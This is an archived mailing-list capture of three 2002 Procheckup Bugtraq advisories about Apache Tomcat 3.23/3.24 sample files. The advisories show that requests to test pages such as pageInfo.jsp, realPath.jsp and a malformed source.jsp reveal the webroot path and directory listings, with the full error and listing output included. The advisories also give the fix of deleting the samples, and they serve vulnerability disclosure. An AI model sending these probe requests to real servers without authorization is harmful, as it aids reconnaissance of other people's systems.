8519294 2002-05-29 13:33 +0000 /479 rader/ <webmaster@procheckup.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-05-29 22:32 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22434>
Ärende: Vulnerability in Apache Tomcat v3.23 & v3.24 (part 3)
------------------------------------------------------------
From: <webmaster@procheckup.com>
To: bugtraq@securityfocus.com
Message-ID: <20020529133342.30363.qmail@mail.securityfocus.com>
Procheckup Ltd
www.procheckup.com
Procheckup Security Bulletin PR02-7
Description: Tomcat multiple sample files display webroot
location on default configuration on request.
Date: 8/1/2002
Application: Apache Tomcat java server v3.23, 3.24.
Platform: Linux/Unix
Severity: Remote attackers can obtain the location of
webroot
Authors: Richard Brain [richard.brain@procheckup.com]
Vendor Status:
CVE Candidate: Not assigned
Reference: www.procheckup.com/security_info/vuln.html
Description:
Tomcat is the free opensource Java server,
http://jakarta.apache.org/tomcat/.
Tomcat comes with a selection of example programs which
displays the location of the webroot with no input, when
Tomcat is installed with default configuration.
The vulnerabilities may only work on port 8080 rather than
port 80, dependant on how the webserver has been configured
with Tomcat.
A) Requesting the following url :-
http://webserver/test/jsp/pageInfo.jsp
The program crashes displaying:-
Error: 500
Location: /test/jsp/pageInfo.jsp
Internal Servlet Error:
org.apache.jasper.JasperException: Unable to compile class
for JSP/"WEBROOT"/localhost_8080%
2Ftest/_0002fjsp_0002fpageInfo_0002ejsppageInfo_jsp_0.java:2
1: ';' expected.
return " " anything <% ' ";
^
"WEBROOT"/localhost_8080%
2Ftest/_0002fjsp_0002fpageInfo_0002ejsppageInfo_jsp_0.java:2
1: Invalid character constant.
return " " anything <% ' ";
^
2 errors
at org.apache.jasper.compiler.Compiler.compile
(Compiler.java:282)
at org.apache.jasper.servlet.JspServlet.doLoadJSP
(JspServlet.java:612)
at org.apache.jasper.servlet.JasperLoader12.loadJSP
(JasperLoader12.java:146)
at org.apache.jasper.servlet.JspServlet.loadJSP
(JspServlet.java:542)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.loadI
fNecessary(JspServlet.java:258)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.servi
ce(JspServlet.java:268)
at
org.apache.jasper.servlet.JspServlet.serviceJspFile
(JspServlet.java:429)
at org.apache.jasper.servlet.JspServlet.service
(JspServlet.java:500)
at javax.servlet.http.HttpServlet.service
(HttpServlet.java:853)
at org.apache.tomcat.core.ServletWrapper.doService
(ServletWrapper.java:405)
at org.apache.tomcat.core.Handler.service
(Handler.java:287)
at org.apache.tomcat.core.ServletWrapper.service
(ServletWrapper.java:372)
at
org.apache.tomcat.core.ContextManager.internalService
(ContextManager.java:812)
at org.apache.tomcat.core.ContextManager.service
(ContextManager.java:758)
at
org.apache.tomcat.service.connector.Ajp12ConnectionHandler.p
rocessConnection(Ajp12ConnectionHandler.java:166)
at org.apache.tomcat.service.TcpWorkerThread.runIt
(PoolTcpEndpoint.java:416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run
(ThreadPool.java:501)
at java.lang.Thread.run(Thread.java:484)
B) Requesting the following url :-
http://webserver/test/jsp/pageImport2.jsp
Error: 500
Location: /test/jsp/pageImport2.jsp
Internal Servlet Error:
org.apache.jasper.JasperException: Unable to compile class
for JSP/"WEBROOT"/localhost_8080%
2Ftest/_0002fjsp_0002fpageImport_00032_0002ejsppageImport2_j
sp_0.java:15: Identifier expected.
import java..;
^
1 error
at org.apache.jasper.compiler.Compiler.compile
(Compiler.java:282)
at org.apache.jasper.servlet.JspServlet.doLoadJSP
(JspServlet.java:612)
at org.apache.jasper.servlet.JasperLoader12.loadJSP
(JasperLoader12.java:146)
at org.apache.jasper.servlet.JspServlet.loadJSP
(JspServlet.java:542)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.loadI
fNecessary(JspServlet.java:258)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.servi
ce(JspServlet.java:268)
at
org.apache.jasper.servlet.JspServlet.serviceJspFile
(JspServlet.java:429)
at org.apache.jasper.servlet.JspServlet.service
(JspServlet.java:500)
at javax.servlet.http.HttpServlet.service
(HttpServlet.java:853)
at org.apache.tomcat.core.ServletWrapper.doService
(ServletWrapper.java:405)
at org.apache.tomcat.core.Handler.service
(Handler.java:287)
at org.apache.tomcat.core.ServletWrapper.service
(ServletWrapper.java:372)
at
org.apache.tomcat.core.ContextManager.internalService
(ContextManager.java:812)
at org.apache.tomcat.core.ContextManager.service
(ContextManager.java:758)
at
org.apache.tomcat.service.connector.Ajp12ConnectionHandler.p
rocessConnection(Ajp12ConnectionHandler.java:166)
at org.apache.tomcat.service.TcpWorkerThread.runIt
(PoolTcpEndpoint.java:416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run
(ThreadPool.java:501)
at java.lang.Thread.run(Thread.java:484)
C) Requesting any of the following urls :-
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
Error: 500
Location: /test/jsp/buffer1.jsp
Internal Servlet Error:
org.apache.jasper.compiler.CompileException: /"WEBROOT"/test
/jsp/buffer1.jsp(3,0) Page directive: invalid value for
buffer
at
org.apache.jasper.compiler.JspParseEventListener$BufferHandl
er.handlePageDirectiveAttribute
(JspParseEventListener.java:490)
at
org.apache.jasper.compiler.JspParseEventListener.handleDirec
tive(JspParseEventListener.java:690)
at
org.apache.jasper.compiler.DelegatingListener.handleDirectiv
e(DelegatingListener.java:116)
at
org.apache.jasper.compiler.Parser$Directive.accept
(Parser.java:215)
at org.apache.jasper.compiler.Parser.parse
(Parser.java:1077)
at org.apache.jasper.compiler.Parser.parse
(Parser.java:1042)
at org.apache.jasper.compiler.Parser.parse
(Parser.java:1038)
at org.apache.jasper.compiler.Compiler.compile
(Compiler.java:209)
at org.apache.jasper.servlet.JspServlet.doLoadJSP
(JspServlet.java:612)
at org.apache.jasper.servlet.JasperLoader12.loadJSP
(JasperLoader12.java:146)
at org.apache.jasper.servlet.JspServlet.loadJSP
(JspServlet.java:542)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.loadI
fNecessary(JspServlet.java:258)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.servi
ce(JspServlet.java:268)
at
org.apache.jasper.servlet.JspServlet.serviceJspFile
(JspServlet.java:429)
at org.apache.jasper.servlet.JspServlet.service
(JspServlet.java:500)
at javax.servlet.http.HttpServlet.service
(HttpServlet.java:853)
at org.apache.tomcat.core.ServletWrapper.doService
(ServletWrapper.java:405)
at org.apache.tomcat.core.Handler.service
(Handler.java:287)
at org.apache.tomcat.core.ServletWrapper.service
(ServletWrapper.java:372)
at
org.apache.tomcat.core.ContextManager.internalService
(ContextManager.java:812)
at org.apache.tomcat.core.ContextManager.service
(ContextManager.java:758)
at
org.apache.tomcat.service.connector.Ajp12ConnectionHandler.p
rocessConnection(Ajp12ConnectionHandler.java:166)
at org.apache.tomcat.service.TcpWorkerThread.runIt
(PoolTcpEndpoint.java:416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run
(ThreadPool.java:501)
at java.lang.Thread.run(Thread.java:484)
D) Requesting any of the following urls :-
http://webserver/test/jsp/comments.jsp
Error: 500
Location: /test/jsp/comments.jsp
Internal Servlet Error:
org.apache.jasper.JasperException: Unable to compile class
for JSP/"WEBROOT"/localhost_8080%
2Ftest/_0002fjsp_0002fcomments_0002ejspcomments_jsp_0.java:2
0: Identifier expected.
int;
^
/"WEBROOT"/localhost_8080%
2Ftest/_0002fjsp_0002fcomments_0002ejspcomments_jsp_0.java:7
2: '}' expected.
out.write("\n\n ");
^
/"WEBROOT"/localhost_8080%
2Ftest/_0002fjsp_0002fcomments_0002ejspcomments_jsp_0.java:7
6: Comment not terminated at end of input.
/*
^
3 errors
at org.apache.jasper.compiler.Compiler.compile
(Compiler.java:282)
at org.apache.jasper.servlet.JspServlet.doLoadJSP
(JspServlet.java:612)
at org.apache.jasper.servlet.JasperLoader12.loadJSP
(JasperLoader12.java:146)
at org.apache.jasper.servlet.JspServlet.loadJSP
(JspServlet.java:542)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.loadI
fNecessary(JspServlet.java:258)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.servi
ce(JspServlet.java:268)
at
org.apache.jasper.servlet.JspServlet.serviceJspFile
(JspServlet.java:429)
at org.apache.jasper.servlet.JspServlet.service
(JspServlet.java:500)
at javax.servlet.http.HttpServlet.service
(HttpServlet.java:853)
at org.apache.tomcat.core.ServletWrapper.doService
(ServletWrapper.java:405)
at org.apache.tomcat.core.Handler.service
(Handler.java:287)
at org.apache.tomcat.core.ServletWrapper.service
(ServletWrapper.java:372)
at
org.apache.tomcat.core.ContextManager.internalService
(ContextManager.java:812)
at org.apache.tomcat.core.ContextManager.service
(ContextManager.java:758)
at
org.apache.tomcat.service.connector.Ajp12ConnectionHandler.p
rocessConnection(Ajp12ConnectionHandler.java:166)
at org.apache.tomcat.service.TcpWorkerThread.runIt
(PoolTcpEndpoint.java:416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run
(ThreadPool.java:501)
at java.lang.Thread.run(Thread.java:484)
E) Requesting any of the following urls :-
extends1.jsp
Internal Servlet Error:
org.apache.jasper.JasperException: Unable to compile class
for JSPNote: sun.tools.javac.Main has been deprecated.
"WEBROOT"/work/localhost_8080%
2Ftest/_0002fjsp_0002fextends_00031_0002ejspextends1_jsp_0.j
ava:49: Incompatible type for method. Explicit cast needed
to convert
jsp._0002fjsp_0002fextends_00031_0002ejspextends1_jsp_0 to
javax.servlet.Servlet.
pageContext = _jspxFactory.getPageContext(this,
request, response,
^
1 error, 1 warning
at org.apache.jasper.compiler.Compiler.compile
(Compiler.java:282)
at org.apache.jasper.servlet.JspServlet.doLoadJSP
(JspServlet.java:612)
at org.apache.jasper.servlet.JasperLoader12.loadJSP
(JasperLoader12.java:146)
at org.apache.jasper.servlet.JspServlet.loadJSP
(JspServlet.java:542)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.loadI
fNecessary(JspServlet.java:258)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.servi
ce(JspServlet.java:268)
at
org.apache.jasper.servlet.JspServlet.serviceJspFile
(JspServlet.java:429)
at org.apache.jasper.servlet.JspServlet.service
(JspServlet.java:500)
at javax.servlet.http.HttpServlet.service
(HttpServlet.java:853)
at org.apache.tomcat.core.ServletWrapper.doService
(ServletWrapper.java:405)
at org.apache.tomcat.core.Handler.service
(Handler.java:287)
at org.apache.tomcat.core.ServletWrapper.service
(ServletWrapper.java:372)
at
org.apache.tomcat.core.ContextManager.internalService
(ContextManager.java:806)
at org.apache.tomcat.core.ContextManager.service
(ContextManager.java:752)
at
org.apache.tomcat.service.http.HttpConnectionHandler.process
Connection(HttpConnectionHandler.java:213)
at org.apache.tomcat.service.TcpWorkerThread.runIt
(PoolTcpEndpoint.java:416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run
(ThreadPool.java:501)
at java.lang.Thread.run(Thread.java:536)
extends2.jsp
Internal Servlet Error:
org.apache.jasper.JasperException: Unable to compile class
for JSPNote: sun.tools.javac.Main has been deprecated.
/"WEBROOT"/localhost_8080%
2Ftest/_0002fjsp_0002fextends_00032_0002ejspextends2_jsp_0.j
ava:50: Incompatible type for method. Explicit cast needed
to convert
jsp._0002fjsp_0002fextends_00032_0002ejspextends2_jsp_0 to
javax.servlet.Servlet.
pageContext = _jspxFactory.getPageContext(this,
request, response,
^
1 error, 1 warning
at org.apache.jasper.compiler.Compiler.compile
(Compiler.java:282)
at org.apache.jasper.servlet.JspServlet.doLoadJSP
(JspServlet.java:612)
at org.apache.jasper.servlet.JasperLoader12.loadJSP
(JasperLoader12.java:146)
at org.apache.jasper.servlet.JspServlet.loadJSP
(JspServlet.java:542)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.loadI
fNecessary(JspServlet.java:258)
at
org.apache.jasper.servlet.JspServlet$JspServletWrapper.servi
ce(JspServlet.java:268)
at
org.apache.jasper.servlet.JspServlet.serviceJspFile
(JspServlet.java:429)
at org.apache.jasper.servlet.JspServlet.service
(JspServlet.java:500)
at javax.servlet.http.HttpServlet.service
(HttpServlet.java:853)
at org.apache.tomcat.core.ServletWrapper.doService
(ServletWrapper.java:405)
at org.apache.tomcat.core.Handler.service
(Handler.java:287)
at org.apache.tomcat.core.ServletWrapper.service
(ServletWrapper.java:372)
at
org.apache.tomcat.core.ContextManager.internalService
(ContextManager.java:806)
at org.apache.tomcat.core.ContextManager.service
(ContextManager.java:752)
at
org.apache.tomcat.service.http.HttpConnectionHandler.process
Connection(HttpConnectionHandler.java:213)
at org.apache.tomcat.service.TcpWorkerThread.runIt
(PoolTcpEndpoint.java:416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run
(ThreadPool.java:501)
at java.lang.Thread.run(Thread.java:536)
F) Requesting any of the following urls :-
http://webserver/test/jsp/pageAutoFlush.jsp
http://webserver/test/jsp/pageDouble.jsp
http://webserver/test/jsp/pageExtends.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/pageInfo.jsp
Internal Servlet Error:
org.apache.jasper.JasperException: Unable to compile class
for JSP/"WEBROOT"/localhost_8080%
2Ftest/_0002fjsp_0002fpageInfo_0002ejsppageInfo_jsp_0.java:2
1: ';' expected.
return " " anything <% ' ";
^
/"WEBROOT"/localhost_8080%
2Ftest/_0002fjsp_0002fpageInfo_0002ejsppageInfo_jsp_0.java:2
1: Invalid character constant.
return " " anything <% ' ";
http://webserver/test/jsp/pageInvalid.jsp
http://webserver/test/jsp/pageIsErrorPage.jsp
http://webserver/test/jsp/pageIsThreadSafe.jsp
http://webserver/test/jsp/pageLanguage.jsp
http://webserver/test/jsp/pageSession.jsp
http://webserver/test/jsp/declaration/IntegerOverflow.jsp
Solution:
Delete the samples directory if not needed
Legal:
Copyright 2002 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this
Bulletin
to the Internet community for the purpose of alerting
them to problems
, if and only if, the Bulletin is not edited or changed
in any way,
is attributed to Procheckup, and provided such
reproduction and/or
distribution is performed for non-commercial purposes.
Any other use of this information is prohibited.
Procheckup is not
liable for any misuse of this information by any third
party.
(8519294) / <webmaster@procheckup.com>/-------------
8519438 2002-05-29 13:32 +0000 /82 rader/ <webmaster@procheckup.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-05-29 23:04 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22438>
Ärende: Vulnerability in Apache Tomcat v3.23 & v3.24 (part 2)
------------------------------------------------------------
From: <webmaster@procheckup.com>
To: bugtraq@securityfocus.com
Message-ID: <20020529133229.30234.qmail@mail.securityfocus.com>
Procheckup Ltd
www.procheckup.com
Procheckup Security Bulletin PR02-06
Description: Tomcat realPath.jsp gives location of web
root.
Date: 8/1/2002
Application: Apache Tomcat Java server versions 3.23 and
3.24
Platform: Linux/Unix
Severity: Remote attackers can obtain the location of
webroot
Authors: Richard Brain [richard.brain@procheckup.com]
Vendor Status:
CVE Candidate: Not assigned
Reference: www.procheckup.com
Description:
Tomcat is the free opensource Java server,
http://jakarta.apache.org/tomcat/.
A example program is provided with tomcat under the
http://webserver/test directory which gives the location of
the webroot.
The test page of "http://webserver/test" displays the
following message :-
"This is the home page of the test hierarchy. It doesn't do
too much good to look at it directly... Instead, why don't
you run the tests to find out what you might want to know.
Oh, by the way, merry christmas.. :)"
The vulnerabilities may only work on port 8080 rather than
port 80, dependant on how the webserver has been configured
with Tomcat.
A) Requesting the following url :-
http://webserver/test/realPath.jsp
Displays the following:-
The virtual path is /test/realPath.jsp
The real path is "WEBROOT"/test/test/realPath.jsp
The real path is "WEBROOT"/test/realPath.jsp
Solution:
Delete the realPath.jsp program.
Legal:
Copyright 2002 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this
Bulletin
to the Internet community for the purpose of alerting
them to problems
, if and only if, the Bulletin is not edited or changed
in any way,
is attributed to Procheckup, and provided such
reproduction and/or
distribution is performed for non-commercial purposes.
Any other use of this information is prohibited.
Procheckup is not
liable for any misuse of this information by any third
party.
(8519438) / <webmaster@procheckup.com>/-------------
8519929 2002-05-29 13:31 +0000 /141 rader/ <webmaster@procheckup.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-05-30 01:48 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22450>
Ärende: Vulnerability in Apache Tomcat v3.23 & v3.24
------------------------------------------------------------
From: <webmaster@procheckup.com>
To: bugtraq@securityfocus.com
Message-ID: <20020529133127.30053.qmail@mail.securityfocus.com>
Procheckup Ltd
www.procheckup.com
Procheckup Security Bulletin PR02-05
Description: Tomcat source.jsp directory listing and
webroot location display
Date: 8/1/2002
Application: Apache Tomcat Java server versions 3.23 and
3.24
Platform: Linux/Unix
Severity: Remote attackers can obtain listings of web
directories and sometines the location of webroot
Authors: Richard Brain [richard.brain@procheckup.com]
Vendor Status:
CVE Candidate: Not assigned
Reference: www.procheckup.com/security_info/vuln.html
Description:
Tomcat is the free opensource Java server,
http://jakarta.apache.org/tomcat/.
Normally source.jsp is used to look at the source code of
programs within the examples directories. A typical
request is
http://webserver:80/examples/jsp/source.jsp?/jsp/num/numgues
s.jsp.
We have found by using source.jsp with a malformed input a
directory listing is displayed and the location of the
webroot is sometimes disclosed.
The vulnerabilities may only work on port 8080 rather than
port 80, dependant on how the webserver has been configured
with Tomcat.
Exploits
A) Requesting the following url :-
http://webserver:80/examples/jsp/source.jsp??
Gives the directory listing and webroot on 3.23, 3.24 just
gives a directory listing.
<title>Directory Listing</title>
<base
href="file://localhost/"WEBROOT"/webapps/examples/"><h1>/"WE
BROOT"/webapps/examples</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif"
width=32 height=32>
<a href="images">images</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsp">jsp</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="META-INF">META-INF</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="servlets">servlets</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="WEB-INF">WEB-INF</a><br>
B) Requesting the following url :-
http://webserver:80/examples/jsp/source.jsp?/jsp/
Gives the directory listing and webroot on 3.23, 3.24 just
gives a directory listing on a subdirectory.
<title>Directory Listing</title>
<base
href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1>
/"WEBROOT"/webapps/examples/jsp</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif"
width=32 height=32>
<a href="cal">cal</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="checkbox">checkbox</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="colors">colors</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="dates">dates</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="error">error</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="forward">forward</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="include">include</a><br><img align=middle
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="index.html">index.html</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsptoserv">jsptoserv</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="num">num</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="plugin">plugin</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="security">security</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="sessions">sessions</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="simpletag">simpletag</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="snp">snp</a><br><img align=middle
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="source.jsp">source.jsp</a><br>
Solution:
Delete the samples directory if not needed.
Legal:
Copyright 2002 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this
Bulletin
to the Internet community for the purpose of alerting
them to problems
, if and only if, the Bulletin is not edited or changed
in any way,
is attributed to Procheckup, and provided such
reproduction and/or
distribution is performed for non-commercial purposes.
Any other use of this information is prohibited.
Procheckup is not
liable for any misuse of this information by any third
party.
(8519929) / <webmaster@procheckup.com>/-------------